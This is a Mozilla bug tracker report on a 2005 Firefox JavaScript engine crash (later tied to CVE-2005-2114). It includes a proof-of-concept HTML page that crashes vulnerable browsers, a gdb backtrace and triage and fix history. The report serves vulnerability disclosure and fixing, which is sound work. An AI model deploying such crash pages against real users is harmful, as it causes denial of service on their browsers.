Closed Bug 299816 Opened 19 years ago Closed 19 years ago

Crashes when executing javascript with for cycle to 20000 calling function(){}; in another function

Categories

(Core :: JavaScript Engine, defect)

Product:
Core
Component:
JavaScript Engine
Type:
defect
Priority:
Not set
Severity:
critical

Tracking

()

Status:
VERIFIED FIXED

People

(Reporter: ras_algeti, Unassigned)

References

(
URL
)

Details

(Keywords: fixed-aviary1.0.5, fixed1.7.9, Whiteboard: fixed by bug 299209) 

User-Agent:       Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4
Build Identifier: Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4

Firefox crashes when click a button with javascript: action. It calls function
CrashFirefox(), which contains for cycle (1 to 20000) calling function with no
name and parameters.


Sample Code:

<html>
<head>
<title>Mozilla JavaScript Crash Issue: Proof-of-Concept</title>
</head>

<body>
<form name="Form1" action="javascript:CrashFirefox();">
			<br>
			To crash your browser, click on the button.<br>
			<br>
			<input type="submit" value="   Go   " name="ButtonStart" style="font-family:
Trebuchet MS; font-size: 10pt; color: #333333; text-decoration:none"><br>
</form>
<script language="JavaScript">
	
	function CrashFirefox()
	{
		for (n = 0; n <= 20000; n++)
		{
			function(){};
		}
		alert("Good news - Your browser is not vulnerable.");
	}
</script>
</body>
</html>


Reproducible: Always

Steps to Reproduce:
1. Open the sample page.
2. Click the "Go" button.
3. Firefox crashes.

Actual Results:  
Firefox crashes.

Expected Results:  
Ending cycle and not crash.
Status: UNCONFIRMED → NEW
Component: General → JavaScript Engine
Ever confirmed: true
OS: Windows NT → All
Product: Firefox → Core
Hardware: PC → All
Version: unspecified → Trunk
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b2) Gecko/20050706
Firefox/1.0+ ID:2005070601

Error: CrashFirefox is not defined
Source File: javascript:CrashFirefox();
Line: 1

And once I put the script part in the HEAD then I get a syntax error on
function(){};
On a week old trunk build (hm, time to rebuild) I get this:

Document http://195.138.144.145/crashmozilla.htm loaded successfully

Program received signal SIGSEGV, Segmentation fault.
0xfeff4a4c in JS_HashTableRawLookup (ht=0xba530, keyHash=2375682,
    key=0x910008) at /home/anlan/scratch/m8/mozilla/js/src/jshash.c:179
179             if (he->keyHash == keyHash && ht->keyCompare(key, he->key)) {
Current language:  auto; currently c
(gdb) bt
#0  0xfeff4a4c in JS_HashTableRawLookup (ht=0xba530, keyHash=2375682,
    key=0x910008) at /home/anlan/scratch/m8/mozilla/js/src/jshash.c:179
#1  0xfeff4e28 in JS_HashTableAdd (ht=0xba530, key=0x910008,
    value=0x90f2f8) at /home/anlan/scratch/m8/mozilla/js/src/jshash.c:257
#2  0xfe4ba31c in _createJSDObject (jsdc=0xaa7b8, cx=0x6aadb8,
    obj=0x910008) at /home/anlan/scratch/m8/mozilla/js/jsd/jsd_obj.c:130
#3  0xfe4ba4d8 in jsd_ObjectHook (cx=0x6aadb8, obj=0x910008, isNew=1,
    closure=0xaa7b8)
    at /home/anlan/scratch/m8/mozilla/js/jsd/jsd_obj.c:171
#4  0xff02ea38 in js_NewObject (cx=0x6aadb8, clasp=0xff0d50d0,
    proto=0x6f2268, parent=0x6abca0)
    at /home/anlan/scratch/m8/mozilla/js/src/jsobj.c:1920
#5  0xfefefd48 in js_CloneFunctionObject (cx=0x6aadb8, funobj=0x6f2268,
    parent=0x6abca0)
    at /home/anlan/scratch/m8/mozilla/js/src/jsfun.c:1969
#6  0xff013e58 in js_Interpret (cx=0x6aadb8, pc=0x794caa "\200",
    result=0xffbfb750)
    at /home/anlan/scratch/m8/mozilla/js/src/jsinterp.c:4391
#7  0xfeff8dd0 in js_Execute (cx=0x6aadb8, chain=0x6abca0,
    script=0x811880, down=0x0, flags=0, result=0xffbfb8b8)
    at /home/anlan/scratch/m8/mozilla/js/src/jsinterp.c:1408
#8  0xfefa87e4 in JS_EvaluateUCScriptForPrincipals (cx=0x6aadb8,
    obj=0x6abca0, principals=0x74016c, chars=0xffbfb988, length=15,


week-old, sure; current trunk yields syntax error on the js. TB7263433E
TB7263433E from 1.0.4 linux.
WFM with
Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8b2) Gecko/20050705
SeaMonkey/1.0a Mnenhy/0.7.2.10005
and
Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8b2) Gecko/20050705
Firefox/1.0+
no crash

*** This bug has been marked as a duplicate of 299209 ***
Status: NEW → RESOLVED
Closed: 19 years ago
Resolution: --- → DUPLICATE
Status: RESOLVED → VERIFIED
This is a public vulnerability, need a public bug to catch dupes. Original bug
299209 was marked sensitive when discussion wandered to other topics.
URL: http://195.138.144.145/crashmozilla.htmhttp://lists.grok.org.uk/pipermail/fu...
Status: VERIFIED → REOPENED
Resolution: DUPLICATE → ---
Fixed by patch in bug 299209, on trunk and branches.
Status: REOPENED → RESOLVED
Closed: 19 years ago19 years ago
Depends on: CVE-2005-2114
Keywords: fixed-aviary1.0.5, fixed1.7.9
Resolution: --- → FIXED
Whiteboard: fixed by bug 299209
*** Bug 300955 has been marked as a duplicate of this bug. ***
*** Bug 300955 has been marked as a duplicate of this bug. ***
Flags: testcase+
(In reply to comment #7)
> Fixed by patch in bug 299209, on trunk and branches.

How can I get a patch for this problem, since 299209 is marked as private?
christopher.grant@tss.teleca.se: if you are a vendor that needs access to specific patch sets you could contact mozilla.org or the security group. but most people can just download newer versions. note that our cvs repository is public and there's a powerful web interface, so it's not like you couldn't find the changes....
Bug 299209 verified fixed.
Status: RESOLVED → VERIFIED
You need to log in before you can comment on or make changes to this bug.